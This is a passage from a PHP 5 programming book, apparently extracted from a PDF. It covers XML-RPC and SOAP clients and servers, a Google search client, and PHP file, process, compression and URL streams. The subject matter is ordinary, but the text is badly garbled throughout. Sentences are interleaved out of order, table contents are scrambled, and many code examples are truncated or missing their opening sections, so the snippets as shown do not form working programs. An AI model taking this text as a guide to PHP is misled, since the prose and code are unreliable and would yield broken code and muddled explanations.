    272 Gutmans_ch08 Page 244 Thursday, September 23, 2004 2:45 PM 244 XML with PHP 5 Chap. 8 transformToUri($xml, "/tmp/crap.html"); ?> OMMUNICATING WITH 8.7 C XML Applications currently communicate via the Internet in several ways, most of which you already know. TCP/IP and UDP/IP are used, but are only low-level transport protocols. Communication between systems is difficult because sys- tems store data in memory using different methods. For example, Intel has a different order of data in memory (Little Endian) than PowerPCs (Big Endian). Another major point was that people just wanted a solid cross-platform tech- nology communication system. One solution is RPC (Remote Procedure Calls), but it’s not easy to use, and it’s implemented differently by Windows than by most UNIX platforms. XML is often the best solution. XML was developed to “promote” interoperability between systems. It allows applications on different systems to communicate using a standard format. XML is ASCII data, so the differences between systems (such as Endianess) is minimized. Other differ- Wed ences, such as date representation, still exist. One platform might specify Wed 2002-12-25 . XML-RPC and SOAP are , another just Dec 25 16:58:40 CET 2002 both XML-based protocols. SOAP is the broader protocol, designed specifically for communication, and is well-supported. 8.7.1 XML-RPC Let’s start with the simplest way of communication: XML-RPC. XML-RPC is a request-response protocol. For every 8.7.1.1 Messages request to a server, a response is returned. The response can be a valid result or an error. Both the request and response packets are encoded as XML. The values in the packets are encoded with different elements. The XML-RPC spec- ification defines a number of scalar types to which the data that is going to be transported must be converted (see Table 8.1). Table 8.1 XML-RPC Data Types XML-RPC Type Description Example Value or Four-byte signed integer -8123 0 (false) or 1 (true) 1 Hello world ASCII string Double-precision signed 91.213 floating-point number 200404021T14:08:55 Date/time eW91IGNhbid0IHJlYWQgdGhpcyE Base 64-encoded binary

    273 Gutmans_ch08 Page 245 Thursday, September 23, 2004 2:45 PM 8.7 Communicating with XML 245 tag, like When a value is transported, it is wrapped inside a this: 20021221R14:12:81 ➥ Two compound data types are available: for non-associative arrays, and : for associative arrays. Here is an example of an 1 Hello! 1 and are wrapped into the ele- As you can see, the values Hello! element. In addition, ment, which is a child of the elements have a key associated with a value, so the XML looks slightly more complicated: key-een 1 key-zwei 2 The values (both scalar and compound) are wrapped inside special tags in requests and responses, which you can see in the following sections. POST requests to an Requests in XML-RPC are normal 8.7.1.2 Request HTTP server with some special additions: POST /chapter_14/xmlrpc_example.php HTTP/1.0 User-Agent: PHP XMLRPC 1.0 Host: localhost Content-Type: text/xml Content-Type The text/xml . is always Content-Length: 164

    274 Gutmans_ch08 Page 246 Thursday, September 23, 2004 2:45 PM 246 XML with PHP 5 Chap. 8 Next, an XML declaration appears. The body consists solely of an XML document, as follows: hello Derick Every RPC request call consists of the tag, followed by the tag that specifies the name of the remote function to call. ele- Parameters can be passed. Each parameter is passed inside a elements are grouped and enclosed in the element, a ment. The param ild of the ch element. The XML-RPC packet in the previous function, passing the parameter . "hello" example code calls the remote Derick 8.7.1.3 Response When the function call succeeds, an XML-RPC response is returned to the caller program, encoded in XML. There are basically two dif- ), ferent responses possible to a request: a normal response ( methodResponse shown in the following example, or a fault. child element of the You can recognize a normal response by the methodResponse always has one tag. A successful child, which always has one child. You can’t return more than one or an to value from within a function, but you can return a shows the result of the methodResponse mimic returning multiple values. The request shown in the previous section: Hi Derick! Not all requests return a normal response, and not everything 8.7.1.4 Fault works as expected (for example, if the PEBCAK). When something doesn’t work as expected, a element is returned, rather than a with two members: the element. The always contains a (with an integer value) and a faultCode (a string). Because the faultString faultCodes are not defined in the XML-RPC specification, they are implemen- tation-independent.

    275 Gutmans_ch08 Page 247 Thursday, September 23, 2004 2:45 PM 8.7 Communicating with XML 247 response: Here is an example of a faultCode 3 faultString Incorrect parameters passed to method< ➥ string> 8.7.1.5 The Client Now, it’s time for a practical application. We’ll start by writing a simple client to call XML-RPC functions on our local machine (a sample for the server follows in the next section). We will be using the PEAR "XML_RPC" class pear install XML_RPC : , which can be installed with send($msg); /* Check for an error, and print out the error message if * necessary */ if (PEAR::isError($p)) { echo $p->getMessage();

    276 Gutmans_ch08 Page 248 Thursday, September 23, 2004 2:45 PM 248 XML with PHP 5 Chap. 8 }else { /* Check if an XML RPC fault was returned, and display * the faultString */ if ($p->faultCode()) { print $p->faultString(); return NULL; } else { /* Return the value upon a valid response */ $res = $p->value(); return $res; } } } Next, we call the RPC functions via the function written. We can specify types for the parameters that we pass to the remote function either explicitly or XML_RPC_Message with one implicitly. In this first example, we construct an explicit parameter that has the value 'Derick' and the type 'string' . The func- 'hello' , and won’t do much more than return tion we call is in response. hi /* Construct the parameter array */ $vals = array ( new XML_RPC_Value('Derick', 'string') ); /* Construct the message with the functionname and * the parameter array */ $msg = new XML_RPC_Message('hello', $vals); /* Send the message and store the result in $res */ $res = call_method($client, $msg); /* If the result is non-null, decode the XML_RPC_Value into a PHP * variable and echo it (we assume here that it returns a * string */ if ($res !== NULL) { echo XML_RPC_decode($res)."\n"; } Rather than instantiating an XML_RPC_Value object with an explicit value type, you can call XML_RPC_encode() , which examines the type of the PHP variable and encodes it as the best-fitting XML-RPC type. Table 8.2 shows the type conversions.

    277 Gutmans_ch08 Page 249 Thursday, September 23, 2004 2:45 PM 8.7 Communicating with XML 249 PHP Type to XML RPC Type Mappings Table 8.2 XML RPC Type PHP Type NULL (empty) Boolean String Integer Float Array (non-associative) Array (associative) Notice that XML-RPC doesn’t have a NULL type and that all types of (because it is inefficient to determine if a arrays are converted to a PHP array has only numeric indices). 'add' function, which The following example passes two s to the adds the two numbers and returns the result: /* Somewhat more example with explicit types and multiple * parameters */ $vals = array ( XML_RPC_encode(80.9), XML_RPC_encode(-9.71) ); $msg = new XML_RPC_Message('add', $vals); $res = call_method($client, $msg); echo XML_RPC_decode($res)."\n"; XML_RPC_decode() function does exactly the opposite of the The function. Types convert from XML-RPC types to PHP types XML_RPC_encode() as shown in Table 8.3. XML RPC Types to PHP Type Mappings Table 8.3 PHP Type XML-RPC Type or Integer Boolean String Float String (20040416T18:16:18) String Array Array 8.7.1.6 Retrospection If you encountered an XML-RPC server somewhere on the Internet, you might want to know which functions it exports. XML-RPC

    278 Gutmans_ch08 Page 250 Thursday, September 23, 2004 2:45 PM 250 XML with PHP 5 Chap. 8 provides support functions that help you to retrieve all the information neces- sary to call the functions on the server. This is called retrospection . With the function, you can retrieve an array containing all 'system.listMethods' exported functions: /* Complex example which shows retrospection */ $msg = new XML_RPC_Message('system.listMethods'); $res = call_method($client, $msg); foreach (XML_RPC_decode($res) as $item) { By looping through the returned array, you can request additional infor- system.method- mation on each function: the description of the function (with the system.methodSignature ). function) and the signature of the function (with Help system.methodHelp returns a string containing the description. system.methodSig- returns an array of arrays containing the types of the parameters. The nature first element in the array is the return type; the remaining elements contain the types of the parameters to pass to the function. The following code first requests the description, and then the types of the return value and parameters for the function: $vals = array (XML_RPC_encode($item)); $msg = new XML_RPC_Message('system.methodHelp', $vals); $desc = XML_RPC_decode(call_method($client, $msg)); $msg = new XML_RPC_Message('system.methodSignature', $vals); $sigs = XML_RPC_decode(call_method($client, $msg)); $siginfo = ''; foreach ($sigs[0] as $sig) { $siginfo .= $sig. " "; } echo "$item\n". wordwrap($desc). "\n\t$siginfo\n\n"; } ?> This was the client side. Now, let’s implement the server side of our two functions. 8.7.1.7 The Server Writing the server is not much harder than writing the client. Instead of including the XML/RPC.php file, we now include the file that implements the server functionality:

    279 Gutmans_ch08 Page 251 Thursday, September 23, 2004 2:45 PM 8.7 Communicating with XML 251 getValues(); /* We simply return an XML_RPC_Values containing the * result with the 'string' type */ return new XML_RPC_Response( ➥ new XML_RPC_Value("Hi {$vals[0]}!", 'string') ); } function add ($args) { $vals = $args->getValues(); return new XML_RPC_Response( new XML_RPC_Value($vals[0] + $vals[1], 'double') ); } To make the functions available to the outside, we need to define the methods by putting the function name, signature, and description string into an array containing an element for each function. The signature is formatted system.methodSignature should return it—an array with an array as how the containing the types: $methods = array( 'hello' => array ( 'function' => 'hello', 'signature' => array( array( $GLOBALS['XML_RPC_String'], $GLOBALS['XML_RPC_String'] ) ), 'docstring' => 'Greets you.' ), 'add' => array ( 'function' => 'add', 'signature' => array( array( $GLOBALS['XML_RPC_Double'], $GLOBALS['XML_RPC_Double'], $GLOBALS['XML_RPC_Double']

    280 Gutmans_ch08 Page 252 Thursday, September 23, 2004 2:45 PM 252 XML with PHP 5 Chap. 8 ) ), 'docstring' => 'Adds two numbers' ) ); We make the defined methods available by instantiating the class. The constructor of this class handles parsing the request XML_RPC_Server and calling the functions. You need to do nothing on your own, unless you want more advanced features that fall outside of the scope of this chapter. $server = new XML_RPC_Server($methods); ?> With this, we conclude XML-RPC. 8.7.2 SOAP This section guides you through using SOAP as a client for the Google Web API and implementing your own SOAP server. Because SOAP is even more complex than XML-RPC, we unfortunately can’t include everything. 8.7.2.1 PEAR::SOAP Google is a nice, fast search engine. Wouldn’t it be great to have your own command-line search engine written in PHP? This section tells you how. Google To make use of the SOAP API that Google exports, you need an account, which you can create on http://www.google.com/apis/. When you regis- ter, you receive a key via email that you use when you call the SOAP method. For the following example to work correctly, you need to install the PEAR SOAP class, with pear install SOAP . After SOAP is installed, we can start with the following simple script. First, include the PEAR::SOAP class: #!/usr/local/bin/php

    281 Gutmans_ch08 Page 253 Thursday, September 23, 2004 2:45 PM 8.7 Communicating with XML 253 The search string is passed on the command line. If no parameter was passed, we’ll display a little usage message: /* Read the search string from the command line */ if ($argc != 2) { echo "usage: ./google.php searchstring\n\n"; exit(); } $query = $argv[1]; Then, we set up the other parameters for the SOAP call. Note that we don’t do anything to specify the type of the variables; we just let the class decide this for us: /* Defining the 'license' key */ $key = 'jx+PnvxQFHIrV1A2rnckQn8t91Pp/6Zg'; /* Defining maximum number of results and starting index */ $maxResults = 3; $start = 0; /* Setup the other parameters */ $filter = FALSE; $restrict = ''; $safeSearch = FALSE; $lr = ''; $ie = ''; $oe = ''; Next, we make the call to Google. The call() SOAP_Client method of the object expects three parameters: ☞ The name of the function to call ☞ An array with parameters for the call ☞ The namespace for the call /* Make the call */ $params = array( 'key' => $key, 'q' => $query, 'start' => $start, 'maxResults' => $maxResults, 'filter' => $filter, 'restrict' => $restrict, 'safeSearch' => $safeSearch, 'lr' => $lr, 'ie' => $ie, 'oe' => $oe

    282 Gutmans_ch08 Page 254 Thursday, September 23, 2004 2:45 PM 254 XML with PHP 5 Chap. 8 ); $response = $client->call( 'doGoogleSearch', $params, array('namespace' => 'urn:GoogleSearch') ); In this example, we assume that the search call returned something use- ful, although it might not always do so. The Google API returns the text with tags. We convert the enti-
    XML entities escaped and with some inserted html_entity_decode() and strip all tags with ties to normal characters using strip_tags() : /* Display results */ foreach ($response->resultElements as $result) { echo html_entity_decode( strip_tags("{$result->title}\n({$result->URL})\n\n") ); echo wordwrap(html_entity_decode(strip_tags($result ➥ ->snippet))); echo "\n\n----------------------------\n\n"; } ?> Now, let’s go to the next example where we implement a simple SOAP cli- ent and server using the same functions as in the XML-RPC examples. SOAP Server SOAP_Server PEAR Here is the server. First, we include the Example Class. Next, we define a class ( ) with the two functions that we want to export through SOAP. In the hello() method, we use implicit conversion from PHP types to SOAP types; in the add() method, we explicitly define the SOAP float ): type (

    283 Gutmans_ch08 Page 255 Thursday, September 23, 2004 2:45 PM 8.7 Communicating with XML 255 To fire up the server and process the request data that is stored in HTTP_RAW_POST_DATA class, instantiate the class , we instantiate the SOAP_Server , and process the SOAP_Server with our methods, associate the class with the service() method of the SOAP_Server object. The service request by calling the method processes the data that was posted to the PHP script, extracts the function name and parameters out of the XML, and calls the function in our Example class: $server = new SOAP_Server; $soapclass = new Example(); $server->addObjectMap($soapclass, 'urn:Example'); $server->service($HTTP_RAW_POST_DATA); ?> SOAP Client The client is much like the Google client, except that we used add() method: explicit typing for the parameters in the call to the #!/usr/local/bin/php call( 'hello', array('arg' => 'Derick'), array('namespace' => 'urn:Example') ); var_dump($response); /* Make the call */ $a = new SOAP_Value('a', 'int', 212.3); $b = new SOAP_Value('b', 'int', 312.3); $response = $client->call( 'add', array($a, $b), array('namespace' => 'urn:Example') ); var_dump($response); ?> This is going over the wire (for the second call). You can see that there is much more XML magic than with XML-RPC:

    284 Gutmans_ch08 Page 256 Thursday, September 23, 2004 2:45 PM 256 XML with PHP 5 Chap. 8 POST /chap_xml/soap/server.php HTTP/1.0 User-Agent: PEAR-SOAP 0.7.1 Host: kossu Content-Type: text/xml; charset=UTF-8 Content-Length: 528 SOAPAction: "" 212.3 312.3 HTTP/1.1 200 OK Date: Tue, 31 Dec 2002 14:56:17 GMT Server: Apache/1.3.27 (Unix) PHP/4.4.0-dev X-Powered-By: PHP/4.4.0-dev Content-Length: 515 Connection: close Content-Type: text/xml; charset=UTF-8 524

    285 Gutmans_ch08 Page 257 Thursday, September 23, 2004 2:45 PM 8.7 Communicating with XML 257 PHP 5 also comes with a SOAP extension 8.7.2.2 PHP’s SOAP Extension PEAR::SOAP , and is written in C ext/soap , which has even more features than , which is written in PHP. With this extension, we’re going instead of PEAR::SOAP to implement the same examples as in the “PEAR::SOAP” section to show you the differences between the two packages. You need to enable the SOAP exten- sion with the PHP configure option or just uncomment the cor- --enable-soap rect line in your php.ini file in case you’re using a Windows version of PHP. (pronounced as “wizdel”), an WSDL The SOAP extension also supports XML vocabulary used to describe Web Services. With this WSDL file, the extension knows certain aspects such as the endpoint, procedures, and mes- sage types with which you can connect to an end point. Google’s Web API SDK package (which you can download at http://www.google.com/apis/down- load.html) includes such a WSDL description file, but we cannot republish this WSDL file here, of course. What we can do is show you an example on how to use it: #!/usr/local/bin/php doGoogleSearch( $key, $query, $start, $maxResults, $filter, $restrict, $safeSearch, $lr, $ie, $oe ); /* Display results */ foreach ($res->resultElements as $result) {

    286 Gutmans_ch08 Page 258 Thursday, September 23, 2004 2:45 PM 258 XML with PHP 5 Chap. 8 echo html_entity_decode( strip_tags("{$result->title}\n({$result->URL})\n\n") ); echo wordwrap(html_entity_decode(strip_tags($result ->snippet))); ➥ echo "\n\n----------------------------\n\n"; } ?> As you compare this script with the one we used for PEAR::SOAP , you see that calling a SOAP method with WSDL is much easier—it’s only two lines! Developing a SOAP server and its accompanying WSDL file is SOAP Server not that hard, either; the largest problem is creating the WSDL description file. The WSDL file is not included here, but can be found in the examples archive belonging to this book. Here is the code for the server: setClass("ExampleService"); $server->handle(); ?> This connects the class that is providing the method with help of the WDSL file to the SOAP server. The handle() method takes care of processing the information when a client requests a method call.

    287 Gutmans_ch08 Page 259 Thursday, September 23, 2004 2:45 PM 8.8 Summary 259 The client looks like this: SOAP Client hello('Derick'), "\n"; This first call is correct, as we supply a parameter to the function: echo $s->hello(), "\n"; This one will throw the SOAP fault exception because the name parame- ter will be empty: } catch (SoapFault $e) { echo $e->faultcode, ' ', $e->faultstring, "\n"; } ?> If we don’t catch this exception, the script will die with a fatal error. Now, it will show this when executed: Hi Derick! SOAP-ENV:Server No name :(. 8.8 S UMMARY XML was designed mainly for use in exchanging information across systems. XML has its own terminology that describes the structure of XML documents. The information is enclosed in tags that identify the information in a struc- tured manner. To receive the actual information from XML documents in order to use it, you must parse the documents. PHP provides two mainstream pars- ers that you can use: SAX (Simple API for XML), which parses each element in the document as it comes to it, and DOM (Document Object Model), which cre- ates a hierarchical tree in memory containing the structure of the entire docu- ment and then parses it all at once. PHP 5 also provides an easier extension for parsing simple XML documents: SimpleXML. PEAR provides packages useful for parsing in specific situations or for specific purposes.

    288 Gutmans_ch08 Page 260 Thursday, September 23, 2004 2:45 PM 260 XML with PHP 5 Chap. 8 Often, you want to convert the XML document into a document with a different format, such as an HTML document or a text file. The standard method for converting XML is XSLT. XSLT uses stylesheets to convert docu- ments, with specific templates for converting each element in the XML docu- ment. XSLT translation in PHP is provided by the XSLT extension. For applications on different systems to communicate, you need to use a protocol that both systems understand. XML files are ASCII files, which pro- vide a standard format that systems understand. Two standard solutions for application communication are available in PHP: XML-RPC, which allows a client to execute methods on a server, and SOAP, which specifies a format for exchanging data across systems. Both are similar client-server protocols. How- ever, SOAP is a more complex, broader protocol with more potential future applications.

    289 Gutmans_ch09 Page 261 Thursday, September 23, 2004 2:47 PM CHAPTER 9 Mainstream Extensions “The important thing is not to stop questioning.”—Albert Einstein NTRODUCTION 9.1 I The previous chapters covered the most widely used extensions. This chapter presents other valuable mainstream extensions. The first section describes a group of functions that are part of the core PHP, not a separate extension. The remaining sections discuss several popular and useful extensions that are not part of the core PHP. After you finish reading this chapter, you will have learned ☞ Open, read, and write local and remote files Communicate with processes and programs ☞ ☞ Work with streams Match text, validate input text, replace text, split text, and other text ☞ manipulations using regular expressions with PHP functions Handle parsing and formatting dates and times, including DST issues ☞ ☞ Build images with the GD extension Exif extension Extract meta information from digital images with the ☞ ☞ Convert between single- and multi-byte character sets S 9.2 F TREAMS ILES AND Accessing files has changed drastically. Prior to PHP 4.3.0, each type of file (local, compressed, remote) had a different implementation. However, with the introduction of streams, every interaction with a file makes use of the , a layer that abstracts access to the implementation details of streams layer a specific kind of “file.” The streams layer makes it possible to create a GD image object from an HTTP source with a URL stream, work with compressed files, or copy a file from one file to another. You can apply your own conversions during the copy process by implementing a user-stream or filter. 261

    290 Gutmans_ch09 Page 262 Thursday, September 23, 2004 2:47 PM Mainstream Extensions Chap. 9 262 9.2.1 File Access Let’s begin with the basic file-accessing functions. Originally, those functions f,” only worked on normal files, so their names begin with “ but PHP extends this to almost everything. The most used functions for file access are ☞ . Opens a handle to a local file, or a file from an URL fopen() ☞ . Reads a block of data from a file fread() ☞ . Reads one single line from a file fgets() / . Writes a block of data to a file fwrite() fputs() ☞ . Closes the opened file handle fclose() ☞ . Returns true when the end of the file has been reached feof() ☞ Working with files is easy, as the following example shows: In line 3, a file handle ( ) is associated with the stream and the stream $fp is associated with the file that is on disk. The first parameter is counter.dat fopen() is the mode. The the path to the file. The second parameter passed to mode specifies whether a stream is opened for reading, writing, both reading and writing, or appending. The following modes exist: . Opens the stream in read-only mode. The file pointer is placed at the r ☞ beginning of the stream. r+ . Opens the stream for reading and writing. The file pointer is placed at ☞ the beginning of the stream. . Opens the stream in write-only mode. The file is cleared and the file w ☞ pointer is placed at the beginning of the stream. If the file does not exist, an attempt is made to create the file. ☞ w+ . Opens the stream for reading and writing. The file is cleared and the file pointer is placed at the beginning of the stream. If the file does not exist, an attempt is made to create the file.

    291 Gutmans_ch09 Page 263 Thursday, September 23, 2004 2:47 PM 263 9.2 Files and Streams . Opens in write-only mode. The file pointer is placed at the end of the a ☞ stream. If the file does not exist, an attempt is made to create the file. ☞ . Opens for reading and writing. The file pointer is placed at the end of a+ stream. If the file does not exist, an attempt is made to create it. The b modifier can be used with the mode to specify that the file is binary. Windows systems differentiate between text and binary files; if you don’t use the modifier for binary files in Windows, your file may become corrupted. b Consequently, to make your scripts portable to Windows, it’s wise to always modifier when you work on a binary file, even when you are develop- b use the ing code on an operating system that doesn’t require it. On UNIX OSs (Linux, b FreeBSD, MacOSX, and so on), the modifier has no effect whatsoever. Here’s another small example: A third optional parameter, that tells PHP to true fopen() , is available for path for the file. The following script first tries to open include look in your (in read-only mode) from , then from , and finally php.ini /etc /usr/local/etc from the current directory (the dot in the path specifies the current directory). is not a binary file, we do not use the modifier for the mode: Because b php.ini $line<\n"; }

    292 Gutmans_ch09 Page 264 Thursday, September 23, 2004 2:47 PM Mainstream Extensions Chap. 9 264 /* Close the stream handle */ fclose($fp); ?> , which is a function we haven’t seen before. This script uses feof() feof() or tests whether the end of a file has been reached during the last fread() as the second parameter. This num- fgets() here, with call. We use 256 fgets() fgets() ber specifies the maximum length if the line that reads. It is important to choose this size carefully. PHP allocates this memory before reading, so if you use a value of 1,000,000, PHP allocates 1MB of memory, even if your line is only 12 characters long. The default is 1,024 bytes, which should be enough for almost all appliances. Try to decide whether you really need to load the entire file into memory when processing a file. Suppose you need to scan a text file for occurrences of a the file into memory with defined phrase with a regular expression. If you load file_get_contents() function and then run the preg_match_all() function, the while you actively waste many resources. It would be more efficient to use a (!feof($fp)) { $line = fgets($fp); } loop, which doesn’t waste memory by loading the entire file into memory. It would speed up the regular expression matching as well. 9.2.2 Program Input/Output Much like UNIX has the paradigm “All IO is a file,” PHP has the paradigm “All IO is a stream.” Thus, when you want to work with the input and output of a program, you open a stream to that program. Because you need to open two channels to your program—one for reading and one for writing—you use one popen() proc_open() of two special functions to open the streams: . or popen() is the simpler function, providing only unidirec- 9.2.2.1 popen() as the opening mode. When you or r w tional IO to a program; you can only use popen() pipe ), you (hence the name open a stream to a program, also called a can use all the normal file functions to read or write from the pipe, and use (for example) feof() to check if there is no more input to read. Here is a small ls –l / example that reads the output of :

    293 Gutmans_ch09 Page 265 Thursday, September 23, 2004 2:47 PM 9.2 Files and Streams 265 popen() is seldom useful because you cannot perform 9.2.2.2 proc_open() any interactive tasks with the opened process. But don’t worry—PHP has a proc_open() proc_open() , function to provide the missing functionality: . With you can link all the input and output handlers of a process to either a pipe from which you can read or a pipe to which you can write from your script, or a file. A pipe is treated as a file handle, except that you can never open a file writing at the same time. handle for reading and requires three parameters: proc_open() resource proc_open ( string cmd, array descriptorspec, array pipes) parameter is the command to execute, such as /usr/local/bin/ The cmd php popen() if . You don’t need to specify the full path to the executable used by your executable is in the system path. descriptorspec parameter is more complex. descriptorspec The is an array with each element describing a file handler for input or output. 9.2.2.3 File Descriptors $fin, 1 => $fout); $res = proc_open("php", $desc, $pipes); if ($res) { proc_close($res); } ?> This script starts a PHP interpreter—a child process. It links the input $fin (which is a file handler for the for the child process to the file descriptor "readfrom" file $fout (which is a file han- ) and the output of the child process to dler for the file ). The "readfrom" file contains "writeto" After the execution of the script, the file "writeto" contains Hello you!

    294 Gutmans_ch09 Page 266 Thursday, September 23, 2004 2:47 PM 266 Mainstream Extensions Chap. 9 | pes 9.2.2.4 P Instead of using a file handler for input and output to the PHP child process, as shown in the script in the previous section, you can open pipes to the child process that allow you to control the spawned process from your script. The following script sends the script from the script itself to the spawned PHP interpreter. The script writes the output of the echo statement to the standard output of the script, applying urlencode . to the output text string "Hello you!" array('pipe', 'r'), 1 => array('pipe', 'w')); $res = proc_open("php", $descs, $pipes); if (is_resource($res)) { fputs($pipes[0], ''); fclose($pipes[0]); while (!feof($pipes[1])) { $line = fgets($pipes[1]); echo urlencode($line); } proc_close($res); } ?> The output is Hello+you%21%0A 9.2.2.5 Files You can pass a file as the handler for the file descriptors to your process, as shown in the following example: array('pipe', 'r'), 1 => array('file', 'output', 'w'), 2 => array('file', 'errors', 'w') ); $res = proc_open("php", $descs, $pipes); if (is_resource($res)) { fputs($pipes[0], ''); fclose($pipes[0]); proc_close($res); } ?>

    295 Gutmans_ch09 Page 267 Thursday, September 23, 2004 2:47 PM 9.2 Files and Streams 267 The output file now contains Hello you! file is empty. and the 'errors' and the output pipe[1] In addition to the input pipe[0] shown in the pre- vious examples, you can use other pipes to redirect all file descriptors of the child process. In the preceding example, we redirect all error messages sent to pipe[2] errors . The index of the , the file the standard error descriptor (2) to $descs array is not limited to the indices 0-2, so that you can always fiddle with all file descriptors as suits you. However, those additional file descriptors, with an index larger than 2, do not work yet on Windows because PHP doesn’t implement a way for the client process to attach to them. Perhaps this will be addressed as PHP develops. 9.2.3 Input/Output Streams stdin , , and stderr as files. These “files,” linked stdout With PHP, you can use stdin , stdout with the stderr stream of the PHP process, can be accessed , and by using a protocol specifier in the call to . For the program input and fopen() php:// . This feature is most useful when work- output streams, this specifier is ing with the Command Line Interface (CLI), which is explained in more detail in Chapter 16, “PHP Shell Scripting.” Two more IO streams are available: php://input and . With php://output php://input , you can read raw POST data. You may want to do so when you need to process WebDAV requests or obtain data from the POST requests yourself, which can be useful when working with WebDAV, XML-RPC, or SOAP. The following example shows how to obtain form data from a form that has two fields with the same name: form.html:

    296 Gutmans_ch09 Page 268 Thursday, September 23, 2004 2:47 PM 268 Mainstream Extensions Chap. 9 process.php:

    Dumping $_POST

    Dumping php://input

    The first script contains only HTML code for a form. The form has two elements with the name "example" : a text field and a select list. When you sub- runs mit the form by clicking the submit query button, the script process.php and displays the output shown in Figure 9.1. php://input Fig. 9.1 representation of POST data As you can see, only one element—the selected value from the select list— $_POST array. However, the data from both is displayed when you dump the fields shows up in the stream. You can parse this raw data yourself. php://input Although, raw data might not be particularly useful with simple POST data, it’s useful to process WebDAV requests or to process requests initiated by other applications. php://output The stream can be used to write to PHP’s output buffers, which is essentially the same as using or print() . php://stdin and php:// echo are read-only; , php://stderr , and php://output are write-only. input php://stdout 9.2.4 Compression Streams PHP provides some wrappers around compression functions. Previously, you needed specialized functions for accessing gzip and bzip compressed files; you can now use the streaming support for those libraries. Reading from and writ- ing to a gzipped or bzipped file works exactly the same as reading and writing a normal file. To use the compression methods, you need to compile PHP with to provide compress.zlib:// --with-zlib --with-bz2 to provide the wrapper and the compress.bzip2:// wrapper. Of course, you need to have the zlib and/or bzip2 libraries installed before you can enable those extensions.

    297 Gutmans_ch09 Page 269 Thursday, September 23, 2004 2:47 PM 9.2 Files and Streams 269 r , , a , b , and Gzip streams support more mode specifiers then the standard w 1 9 and the compres- . These additional modifiers include the compression level + - for filtered and h for huffman only compressing. These modifiers sion methods f only make sense if you open the file for writing. In the following example, we demonstrate copying a file from a bzipped file to a gzipped file. We make use of the compression level specifier 1 to speed up , to specify searching for the file in fopen() compression, and the third parameter the path. Be careful when using the include path parameter because it include will have a performance impact on your script. PHP tries to find and open the file throughout the entire include path, which slows down your script because file operations are generally show operations on most operating systems. /var/log , This script first sets the include path to , and the cur- /usr/var/log rent directory (.). Next, it tries to open the logfile.bz2 file from the path include 1 . If both streams and opens the foo1.gz file for writing with compression level are opened successfully, the script reads from the bzipped file until it reaches the end and writes the contents directly into the gzipped file. When the script fin- ishes copying the contents, it closes the streams. Tip: Another great aspect about streams is that you can nest wrappers. For example, you can open them from the following URL: compress.zlib://http://www.example.com/foobar.gz

    298 Gutmans_ch09 Page 270 Thursday, September 23, 2004 2:47 PM 270 Mainstream Extensions Chap. 9 9.2.5 User Streams The streams layer in PHP 5 allows defining User Streams —stream wrappers implemented in PHP code. This User Stream is implemented by a class and, for every file operation (opening, reading, for instance), you need to implement a method. This section describes the methods that must be implemented. boolean stream_open ( string path, string mode, int 9.2.5.1 This function is called when is fopen() options, string opened_path); called on this stream. The path is the full URL as specified in the fopen() call, parseurl() which you need to interpret correctly. The function helps for this. parameter, set by the options You also need to validate the mode yourself. The stream’s API, is a bit field consisting of the following constants: . This constant is set in the bit field when ☞ was passed STREAM_USE_PATH TRUE use_include_path fopen() . It’s up to you to do some- as the parameter to thing with it if needed. STREAM_REPORT_ERRORS ☞ . If this constant is set, you need to handle trigger function; if it’s not set, you errors yourself with the trigger_error() should not raise any errors yourself. void stream_close ( void ); The stream_close method is 9.2.5.2 fclose() is called on the stream, or when PHP closes the stream called when resource during shutdown. You need to take care of releasing any resources that you might have locked or opened. string stream_read ( int count); When or fread() 9.2.5.3 fgets() method is called in stream_read triggers a read request on the stream, the count bytes from the stream. If there response. You should always try to return is not much data available, just return as many bytes as you have left in the FALSE stream. If no data is available, return or an empty string. Do not forget to update the read/write position of the stream. This position is usually stored in the position property of your class. int stream_write ( string data); The 9.2.5.4 method stream_write is called when or fwrite() is called on this stream. You should store as fputs() much of the data as possible, and return the number of bytes that actually were stored in the container. If no data could be stored, you should return . 0 You should also take care of updating the position pointer. boolean stream_eof ( void ); This method is called when 9.2.5.5 is called on the stream. Return TRUE if the end of the stream is reached, feof() or FALSE if the end has not been reached yet.

    299 Gutmans_ch09 Page 271 Thursday, September 23, 2004 2:47 PM 9.2 Files and Streams 271 int stream_tell ( void ); The method is called 9.2.5.6 stream_tell() request on the stream. You should return the value of the read/ on a ftell() write position pointer. 9.2.5.7 boolean stream_seek ( int offset, int whence); stream_seek fseek() is applied on the stream handle. The offset is called when is an integer value that moves the file pointer (seeking) back (on a negative offset is calculated based seek number) or forward (on a positive number). The on the second parameter, which has one of the following constants: . The offset passed to the function should be calculated from the ☞ SEEK_SET beginning. SEEK_CUR ☞ . The offset is relative to the current stream position. . The offset is relative to the end of the stream. Positions in the SEEK_END ☞ stream have a negative offset; positive offsets correspond with positions after the end of the stream. The function should implement the changing of the stream pointer and return FALSE if the seek could not be TRUE if the position could be changed, or executed. boolean stream_flush ( void ); 9.2.5.8 Your user stream may cache data written to the stream for better performance. The method stream_flush() fflush() function. If is called when the user commits all cached data with the there was no cached data or all cached data could be written to the storage container (such as a file or a table in a database), the function should return TRUE ; if the cached data could not be committed to the storage container, it . should return FALSE 9.2.6 URL Streams URL streams have a path that The last category of streams is URL streams. http://example.com/index.php or ftp://user:pass- resemble a URL, such as word@ftp.example.com . In fact, all special wrappers use a URL-like path, such compress.zlib://file.gz as . However, only schemes that resemble a remote resource, such as a file on an FTP server or a document on a gopher server, fall into the category URL streams. The basic URL streams that PHP supports are ☞ http:// . For files located on an HTTP server ☞ . For files located on an SSL enhanced HTTP server https:// ☞ ftp:// . For files on an FTP server ☞ ftps:// . For files on an FTP server with SSL support

    300 Gutmans_ch09 Page 272 Thursday, September 23, 2004 2:47 PM 272 Mainstream Extensions Chap. 9 SSL support for HTTP and FTP is only available if you added OpenSSL by specifying --with-openssl when you configured PHP. For authentication to user- HTTP or FTP servers, you can prefix the hostname in the URL with name:password@ , as in the following: $fp = fopen ('ftp://derick:secret@ftp.php.net', 'wb'); The HTTP handler only supports the reading of files, so you need to spec- . (Strictly, the b is only needed on Windows, but it doesn’t hurt ify the mode rb to add it.) The FTP handler supports opening a stream only in either read or write mode, but not in both simultaneously. Also, if you try to open an existing 'overwrite' context file for writing, the connection fails, unless you set the option (see Figure 9.2): array('overwrite' => true)); ➥ $fp = fopen('ftp://secret@ftp.php.net', 'wb', false, $context); ?> phpsuck in action. Fig. 9.2 The following example demonstrates reading a file from an HTTP server and saving it into a compressed file. This example also introduces a fourth parameter to the fopen() call that specifies a context for the stream. By using the context parameter, you can set special options for a stream. For example, you can set a notifier. This notifier callback will be called on different events transaction : during the #!/usr/local/bin/php

